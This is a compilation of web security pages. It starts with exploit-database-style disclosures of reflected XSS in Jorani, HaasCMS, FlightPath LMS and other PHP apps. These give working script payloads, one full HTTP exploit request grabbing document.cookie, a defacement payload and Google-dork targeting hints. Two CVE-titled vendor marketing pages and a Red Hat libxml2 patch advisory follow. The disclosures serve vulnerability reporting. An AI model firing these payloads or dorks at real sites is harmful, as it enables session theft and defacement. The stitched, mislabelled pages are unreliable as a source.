Jorani version 1.0.3 suffers from a cross site scripting vulnerability.

    ## Title: Jorani-v1.0.3-©2014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure## Author: nu11secur1ty## Date: 08/27/2023## Vendor: https://jorani.org/## Software: https://demo.jorani.org/session/login## Reference: https://portswigger.net/web-security/cross-site-scripting## Reference: https://portswigger.net/web-security/information-disclosure## Description:The value of the `language request` parameter is copied into aJavaScript string which is encapsulated in double quotation marks. Thepayload 75943";alert(1)//569 was submitted in the language parameter.This input was echoed unmodified in the application's response.The attacker can modify the token session and he can discoversensitive information for the server.STATUS: HIGH-Vulnerability[+]Exploit:```POSTPOST /session/login HTTP/1.1Host: demo.jorani.orgAccept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36Connection: closeCache-Control: max-age=0Cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;jorani_session=fbc630d2510ffdd2a981ccfe97301b1b90ab47dc#ATTACKOrigin: http://demo.jorani.orgUpgrade-Insecure-Requests: 1Referer: http://demo.jorani.org/session/loginContent-Type: application/x-www-form-urlencodedSec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Content-Length: 183csrf_test_jorani=9b4b02ece59e0f321cd0324a633b5dd2&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ennois&login=bbalet&CipheredValue=```[+]Response:```HTTPHTTP/1.1 200 OKdate: Sun, 27 Aug 2023 06:03:04 GMTcontent-type: text/html; charset=UTF-8Content-Length: 681server: Apachex-powered-by: PHP/8.2expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheset-cookie: csrf_cookie_jorani=9b4b02ece59e0f321cd0324a633b5dd2;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/;SameSite=Strictset-cookie: jorani_session=9ae823ffa74d722c809f6bda69954593483f2cfd;expires=Sun, 27 Aug 2023 08:03:04 GMT; Max-Age=7200; path=/; HttpOnly;SameSite=Laxlast-modified: Sun, 27 Aug 2023 06:03:04 GMTvary: Accept-Encodingcache-control: private, no-cache, no-store, proxy-revalidate,no-transform, must-revalidatepragma: no-cachex-iplb-request-id: 3E497A1D:118A_D5BA2118:0050_64EAE718_12C0:1FBA1x-iplb-instance: 27474connection: close<div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: 8192</p><p>Message:  strlen(): Passing null to parameter #1 ($string) of typestring is deprecated</p><p>Filename: controllers/Connection.php</p><p>Line Number: 126</p></div><div style="border:1px solid #990000;padding-left:20px;margin:0 0 10px 0;"><h4>A PHP Error was encountered</h4><p>Severity: Warning</p><p>Message:  Cannot modify header information - headers already sentby (output started at/home/decouvric/demo.jorani.org/system/core/Exceptions.php:272)</p><p>Filename: helpers/url_helper.php</p><p>Line Number: 565</p></div>```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Jorani/2023/Jorani-v1.0.3-%C2%A92014-2023-Benjamin-BALET-XSS-Reflected-Information-Disclosure)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/jorani-v103-2014-2023-benjamin-balet.html)## Time spend:01:35:00

Jorani 1.0.3 Cross Site Scripting

Hesk Rtl CMS version 1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Hesk Rtl CMS v1 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://p30vel.ir                                                                                                  || # Dork      : فارسی سازی توسط وحید مجیدی / اسکریپت دات کام                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This vulnerability affects : /Hesk/ajax.php. [+] Attack details :    URI was set to ;997612"():;991161    The input is reflected inside <script> tag between double quotesGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Hesk Rtl CMS 1 Cross Site Scripting

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

**Hasan MWB 1 Cross Site Scripting**

Posted Aug 28, 2023

Authored by indoushka

Hasan MWB version 1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4a53646feef7ce0d66491bbe2483dcbe70097fdb2aef17667fd6e5a2c356c92e

Download | Favorite | View

**Hasan MWB 1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Hasan MWB v1 - XSS Vulnerability                                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               || # Vendor    : http://sourceforge.net/                                                                                            |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /?q=1</title><ScRiPt >prompt(/indoushka/)</ScRiPt>[+] go to http://127.0.0.1/hasanmwbsourceforgenet/?q=1%3C/title%3E%3CScRiPt%20%3Eprompt(/indoushka/)%3C/ScRiPt%3E Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,016)
*   Arbitrary (16,216)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,456)
*   Encryption (2,370)
*   Exploit (51,984)
*   File Inclusion (4,224)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,786)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,811)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,392)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,967)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,514)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,754)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,838)
*   UNIX (9,293)
*   UnixWare (186)
*   Windows (6,575)
*   Other

Hasan MWB 1 Cross Site Scripting

HaasCMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : HaasCMS v1.0 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://haasit.com/                                                                                                 |  | # Dork      : Website Design by Haas IT Solutions, Inc.                                                                          |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /printobit.php?id=437999999.9'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  http://target_site/printobit.php?id=437999999.9%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

HaasCMS 1.0 Cross Site Scripting

Gusto Recipes Management version 1.5.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Gusto - Recipes Management v1.5.1 System XSS Vulnerability                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.elmanawy.info/demo/gusto/                                                                              |  | # Dork      : /profile/1-gusto                                                                                                   |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use Payload : /search?category_id=1&title=Mr.'"()%26%25<acx><script>alert(/indoushka/);</script> [+]  https://127.0.0.1/elmanawyinfo/demo/gusto/recipes/search?category_id=1&title=Mr.%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E  Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Gusto Recipes Management 1.5.1 Cross Site Scripting

Global Domains International version 2.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : Global Domains International v2.0 XSS Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.worldsite.ws/                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected File : /idn-orderflow/index.dhtml [+] use Payload : /idn-orderflow/index.dhtml?act=pre_search&domains=Type a word&lang_original=af_</script><script>prompt(964811)</script>&no_new=true&search_from=frontpage&step=30&userid=bnftfnad&xs=[+] https://127.0.0.1/worldsitews/idn-orderflow/index.dhtml?act=pre_search&domains=Type%20a%20word&lang_original=af_%3C/script%3E%3Cscript%3Eprompt(964811)%3C/script%3E&no_new=true&search_from=frontpage&step=30&userid=bnftfnad&xs=Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Global Domains International 2.0 Cross Site Scripting

FlightPath LMS version 5.0-rc2 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : FlightPath LMS v5.0-rc2 XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://getflightpath.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=<--`<script>alert(/indoushka/);</script>``> --!>[+] https://127.0.0.1/webservicesulmedu/flightpath/tools/course-search/courses?mode=AFAS&subject_id=AFAS&only_term=%3C--`%3Cscript%3Ealert(/indoushka/);%3C/script%3E``%3E%20--!%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

FlightPath LMS 5.0-rc2 Cross Site Scripting

A stored cross-site scripting (XSS) vulnerability in Free and Open Source Inventory Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Add New parameter under the New Buy section.

Submitted by mayuri\_k on Sunday, July 30, 2023 - 15:55.

In today's competitive business landscape, efficient inventory management is essential for success. Managing stock levels, tracking sales, and ensuring seamless operations can be challenging without the right tools. Fortunately, there are Free and Open Source Inventory Management Systems available, coded in PHP, that can revolutionize the way you handle your inventory. In this article, we will explore the benefits of using such a system and provide you with access to the PHP source code, enabling you to optimize your inventory management and boost your business efficiency.

The Importance of an Inventory Management System

A well-designed Inventory Management System streamlines the entire inventory control process, providing numerous advantages for businesses, including:

\- Real-time Stock Visibility: Keep track of your inventory levels in real-time, ensuring you never run out of stock or overstock.

\- Accurate Sales Tracking: Monitor sales patterns, identify popular products, and make data-driven decisions.

\- Order Management: Process orders efficiently, reducing fulfillment time and enhancing customer satisfaction.

\- Cost Savings: Minimize losses due to overstocking, spoilage, or theft, maximizing profitability.

The Benefits of Free and Open Source Inventory Management Systems

Choosing a Free and Open Source Inventory Management System has several advantages:

\- Cost-Effective Solution: Avoid expensive licensing fees and enjoy a cost-effective, customizable solution.

\- Flexibility and Customization: Modify the source code to fit your specific business needs and workflows.

\- Strong Community Support: Benefit from a thriving community of developers who actively contribute to the system's improvement and security.

\- Regular Updates: Enjoy regular updates and enhancements, ensuring your system stays up-to-date with the latest features and fixes.

Introducing the PHP Inventory Management System

Our recommended PHP Inventory Management System offers a user-friendly interface, robust features, and easy integration with your existing systems. Let's delve into some of its key features:

\- Product Management: Effortlessly add, edit, and categorize products, complete with descriptions, images, and stock levels.

\- Inventory Tracking: Monitor stock levels, set reorder points, and receive notifications when stocks are running low.

\- Sales and Order Management: Process orders efficiently, generate invoices, and manage sales records.

\- Reporting and Analytics: Generate insightful reports on sales, inventory levels, and profitability.

\- User Authentication and Access Control: Securely manage user accounts with role-based access.

How to Implement the Inventory Management System

To get started, download the free PHP Inventory Management System source code from the provided link. Ensure you have PHP installed on your local or server environment. Import the database and configure the system to fit your business requirements.

**Check here Installation steps :**

Incorporating a Free and Open Source Inventory Management System coded in PHP can transform the way you manage your inventory. By providing real-time stock visibility, accurate sales tracking, and efficient order management, your business will experience enhanced efficiency and cost savings. Embrace the power of open-source solutions, and with the access to the PHP source code, you can tailor the Inventory Management System to perfectly suit your business needs. Upgrade your inventory management today and propel your business to new heights of success!

**How to Run this Free and Open Source inventory management system php source code :**

1.  Download source code (zip file) of inventory management system project with SQL file.
2.  Extract the file of the project folder (zip file) related to the ample
3.  Copy project folder i.e source code files to htdocs
4.  open localhost/phpmyadmin and create a database (remember PHP version must be a minimum of 7.1)
5.  Now import the database of the SQL file
6.  Open source code files and check database name is proper or not.
7.  Now open the admin panel and log in with provided credentials.
    
    **I provide high-quality software projects, thesis writing services, website development services, and web application development. If there is any need you can contact me by email.**
    

*   5454 views

CVE-2023-39708: Free and Open Source inventory management system php source code

There is a Cross Site Scripting (XSS) vulnerability in the "action" parameter of index.php in PHPJabbers Make an Offer Widget v1.0.

Let clients suggest prices for your products and services using a simple make-an-offer button.

Version: 1.0

Embed a discrete make-an-offer app into your website and collect your clients' feedback on your pricing. You can either predefine three price options or give users the chance to propose their own price. Review the average offered price for each product or service and use it to adjust your pricing policy accordingly. Depending on the kind of offers made by your clients, you can choose to automatically ask for their email to start sending them your newsletter, or give them a promo code for the specific product, or just thank them.

**Make An Offer Widget**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Give your customers the chance to negotiate prices and win promo codes for the products and services they suggest prices for. The Make An Offer Widget is a simple call-to-action app that will bring life to your website and help you adjust your pricing policy.

Price Suggestions

With the Make An Offer Widget, you can give your website visitors three price options to choose from or let them propose any price.

Diverse Color Themes

10 color themes are available for each make-an-offer button so that you can easily adapt them to your website design and branding.

Unlimited Offer Widgets

Create separate offer widgets for each product or service. There is no limit on the number of make-an-offer buttons you can create.

Email & SMS Notifications

Create autoresponder messages that will be sent via email or SMS to administrators when a new offer is received.

Three Price Scenarios

Each offer option (both fixed price and price percentage) can lead to a different action: send an email, promo code, or thank-you email.

Expand Your Client Database

Using the make-an-offer app and the emails it collects from your clients you can enrich your customer database.

Review Offers & Emails

See a list of all offers received and check visitors' IP addresses and emails, if available. Filter offers by type using quick tabs.

PHP Source Code Customization

Buy a Developer License and make custom changes to the source code. Or request us to modify the make-an-offer app for you.

SPECIAL OFFER

**Make An Offer Widget for $4.29 Only**

Get all 65 PHPJabbers scripts in a bundle for just $299.

**Live Demo**

Preview both the front end and back end of the Make An Offer Widget and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Make An Offer Widget**

**Key Benefits**

Installation Support

Key Features

Customizations

Remote Hosting

High Performance

**Pricing**

You can buy the Make An Offer Widget both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

$4.29

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

$4.29 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

$299

VIEW DETAILS

**Testimonials**

Let our clients share their experience with the Make An Offer Widget and how the script has improved their online business.

“

PHPjabbers offers incredible PHP scripts that not only look good but are also enjoyable to set up and use. But what keeps me coming back to buy their latest scripts is the unbeatable customer service that you can't find anywhere else.

Andrew Jensen

“

Thank you, you guys are great. I am really impressed with your patience with me, as I am not an expert with codes and the way you come through for me. I am in services myself and I will like to thank you for an excellent service and support. I would recommend your products and your company to all my associates. Excellent service and support.  
Thank you again!

marios constantinou

“

I use Freeway (software) for web design, and learned of PHPJabbers on one of their forums where they received applause as offering easy to implement and well-supported PHP scripts. I totally agree.

Robert Hicks

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Make An Offer Widget.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**STIVA Shopping Cart**

$49 / $89

**Callback Widget**

$19 / $29

**PHP Review Script**

$39 / $79

**PHP Poll Script**

$19 / $29

**Document Creator**

$19 / $39

**PHP Comment Script**

$19 / $39

CVE-2023-40752: Make An Offer Widget | PHPJabbers

An update for libxml2 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2016-3709: A Cross-site scripting (XSS) vulnerability was found in libxml2. A specially crafted input, when serialized and re-parsed by the libxml2 library, will result in a document with element attributes that did not exist in the original document.


**Synopsis**

Moderate: libxml2 security update

**Type/Severity**

Security Advisory: Moderate

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for libxml2 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

The libxml2 library is a development toolbox providing the implementation of various XML standards.  

Security Fix(es):  

*   libxml2: Incorrect server side include parsing can lead to XSS (CVE-2016-3709)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

The desktop must be restarted (log out, then log back in) for this update to take effect.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 - Extended Update Support 8.6 x86\_64
*   Red Hat Enterprise Linux Server - AUS 8.6 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.6 s390x
*   Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.6 ppc64le
*   Red Hat Enterprise Linux Server - TUS 8.6 x86\_64
*   Red Hat Enterprise Linux for ARM 64 - Extended Update Support 8.6 aarch64
*   Red Hat Enterprise Linux Server for Power LE - Update Services for SAP Solutions 8.6 ppc64le
*   Red Hat Enterprise Linux for x86\_64 - Update Services for SAP Solutions 8.6 x86\_64

**Fixes**

*   BZ - 2112766 - CVE-2016-3709 libxml2: Incorrect server side include parsing can lead to XSS

**Red Hat Enterprise Linux for x86\_64 - Extended Update Support 8.6**

SRPM

libxml2-2.9.7-13.el8\_6.2.src.rpm

SHA-256: eea07c2634e3a208611c537e5df61b8fc49ddff47be09c85fd719015772b839e

x86\_64

libxml2-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 50a94161230ef62e84d83220121b45cea86241699972fba80e8f9f6ce4c9013a

libxml2-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 99127c52813644231a1d3b32c8cd70e58853c6aaa6529027a95090727bed4009

libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 36ec71b9b5174901379a4967c320063e968099bb3624643580a830ab0ced2bff

libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 36ec71b9b5174901379a4967c320063e968099bb3624643580a830ab0ced2bff

libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61b02fcd23c16423549cc206dd0d72a61e87adb5551547821efb466cefc5fe5f

libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61b02fcd23c16423549cc206dd0d72a61e87adb5551547821efb466cefc5fe5f

libxml2-debugsource-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 819ea386db5c823f3e58d8b7014db878c57e63c9413634ab62d92979eac352bf

libxml2-debugsource-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 819ea386db5c823f3e58d8b7014db878c57e63c9413634ab62d92979eac352bf

libxml2-debugsource-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 629653b683f5f2367eb7106ea50185e221bedc06cb6c710d3decc8a585717287

libxml2-debugsource-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 629653b683f5f2367eb7106ea50185e221bedc06cb6c710d3decc8a585717287

libxml2-devel-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: a3485cdeccc73a23ae31c070f1a5d88c5fd987442ea36bb883293bb789b111df

libxml2-devel-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61ebb256fa055cf2a2afb22f54e70fbfaf3190313dae9638f03a34d1c32e2fea

python3-libxml2-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: cc8ab042086881314c1a3032e113ea00048e8fba99b7ba3ced480320b9791502

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 6268214f6e010ee1407a6f9711ae6962161d3fe32833775be0bebcd5681a3275

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 6268214f6e010ee1407a6f9711ae6962161d3fe32833775be0bebcd5681a3275

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: dacd15510274685de974c638f67131d4a94e634ae89e80d17223347d7130eaa8

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: dacd15510274685de974c638f67131d4a94e634ae89e80d17223347d7130eaa8

**Red Hat Enterprise Linux Server - AUS 8.6**

SRPM

libxml2-2.9.7-13.el8\_6.2.src.rpm

SHA-256: eea07c2634e3a208611c537e5df61b8fc49ddff47be09c85fd719015772b839e

x86\_64

libxml2-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 50a94161230ef62e84d83220121b45cea86241699972fba80e8f9f6ce4c9013a

libxml2-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 99127c52813644231a1d3b32c8cd70e58853c6aaa6529027a95090727bed4009

libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 36ec71b9b5174901379a4967c320063e968099bb3624643580a830ab0ced2bff

libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 36ec71b9b5174901379a4967c320063e968099bb3624643580a830ab0ced2bff

libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61b02fcd23c16423549cc206dd0d72a61e87adb5551547821efb466cefc5fe5f

libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61b02fcd23c16423549cc206dd0d72a61e87adb5551547821efb466cefc5fe5f

libxml2-debugsource-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 819ea386db5c823f3e58d8b7014db878c57e63c9413634ab62d92979eac352bf

libxml2-debugsource-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 819ea386db5c823f3e58d8b7014db878c57e63c9413634ab62d92979eac352bf

libxml2-debugsource-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 629653b683f5f2367eb7106ea50185e221bedc06cb6c710d3decc8a585717287

libxml2-debugsource-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 629653b683f5f2367eb7106ea50185e221bedc06cb6c710d3decc8a585717287

libxml2-devel-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: a3485cdeccc73a23ae31c070f1a5d88c5fd987442ea36bb883293bb789b111df

libxml2-devel-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: 61ebb256fa055cf2a2afb22f54e70fbfaf3190313dae9638f03a34d1c32e2fea

python3-libxml2-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: cc8ab042086881314c1a3032e113ea00048e8fba99b7ba3ced480320b9791502

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 6268214f6e010ee1407a6f9711ae6962161d3fe32833775be0bebcd5681a3275

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.i686.rpm

SHA-256: 6268214f6e010ee1407a6f9711ae6962161d3fe32833775be0bebcd5681a3275

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: dacd15510274685de974c638f67131d4a94e634ae89e80d17223347d7130eaa8

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.x86\_64.rpm

SHA-256: dacd15510274685de974c638f67131d4a94e634ae89e80d17223347d7130eaa8

**Red Hat Enterprise Linux for IBM z Systems - Extended Update Support 8.6**

SRPM

libxml2-2.9.7-13.el8\_6.2.src.rpm

SHA-256: eea07c2634e3a208611c537e5df61b8fc49ddff47be09c85fd719015772b839e

s390x

libxml2-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 635cc9d2e18912f088e3dff47419b3a40bde6f912f91697d0f8f947415c88c34

libxml2-debuginfo-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 0b5ee4a28d31529a1445aa6297b5063f42459887353b9eda2c931427899ede0c

libxml2-debuginfo-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 0b5ee4a28d31529a1445aa6297b5063f42459887353b9eda2c931427899ede0c

libxml2-debugsource-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 1d294e86113c9000d416be572a42d5ca9cdcc9370409a0850aab1e433f0ccede

libxml2-debugsource-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 1d294e86113c9000d416be572a42d5ca9cdcc9370409a0850aab1e433f0ccede

libxml2-devel-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 9ef12845bac23d0eb7557c6b39e7686b362989d434ec6db4830f606cdd23b351

python3-libxml2-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 26de33586d0fe16ad5a3a8ef2a37ab791109b9d371a211bbb4d96a865121ea7d

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 9f9710bf1671f7210299263dd98be61472b1f55c2c14dcbf042ddd4133fce855

python3-libxml2-debuginfo-2.9.7-13.el8\_6.2.s390x.rpm

SHA-256: 9f9710bf1671f7210299263dd98be61472b1f55c2c14dcbf042ddd4133fce855

**Red Hat Enterprise Linux for Power, little endian - Extended Update Support 8.6**

SRPM

libxml2-2.9.7-13.el8\_6.2.src.rpm

SHA-256: eea07c2634e3a208611c537e5df61b8fc49ddff47be09c85fd719015772b839e

ppc64le

libxml2-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 1181e30f2a5e5e0875e56263b6279458edff93ffb6fe4ab3cdb53a26ded978a5

libxml2-debuginfo-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 027b0ef9b4392cfd8b195f6f62f55aa094ed702021e8fee4c27da3ad6388a071

libxml2-debuginfo-2.9.7-13.el8\_6.2.ppc64le.rpm

SHA-256: 027b0ef9b4392cfd8b195f6f62f55aa094ed702021e8fee4c27da3ad6388a071

libxml2-debugsource-2.9.7-13.el8\_6.2.ppc64le.rpm

